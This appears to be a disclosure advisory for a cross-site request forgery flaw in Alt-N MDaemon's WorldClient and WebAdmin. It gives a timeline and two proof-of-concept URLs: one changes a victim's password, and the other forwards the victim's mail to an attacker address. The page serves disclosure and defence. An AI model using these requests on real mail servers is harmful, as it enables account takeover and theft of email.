Skip to Content

Alt-N MDaemon's WorldClient & WebAdmin Cross-Site Request Forgery Vulnerability


Posted by Michalis Nicolaou


           

Alt-N MDaemon's WorldClient & WebAdmin Cross-Site Request Forgery Vulnerability


Software:    Alt-N MDaemon v13.0.3 and prior versions

Vendor:    http://www.altn.com/

Vulnerability Type:    Cross-Site Request Forgery

Remote:    Yes

Local:    No

Discovered:    25 July 2012

Reported:    19 December 2012

Disclosed:    18 February 2013

Whitepaper:   Pwning_MDaemon.pdf

VULNERABILITY DESCRIPTION:

Alt-N WorldClient and WebAdmin applications are prone to a cross-site request-forgery vulnerability. It should be noted that partial protection is provided by the Session parameter, but this alone cannot be considered as an adequate protection mechanism.

An attacker can exploit this issue to perform different actions on the affected application without the user's consent. For example, the attacker can change the user's password, forward a copy of the user's emails to a different email account, retrieve his/her address book, send email messages to other users/email addresses and/or perform other similar tasks.

Alt-N MDaemon v13.0.3 & v12.5.6 were tested and found vulnerable; other versions may also be affected.

PoC Exploit:

Change Password:

http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n

Enable Forwarding:

http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=hacker%40example.com


Recommended Post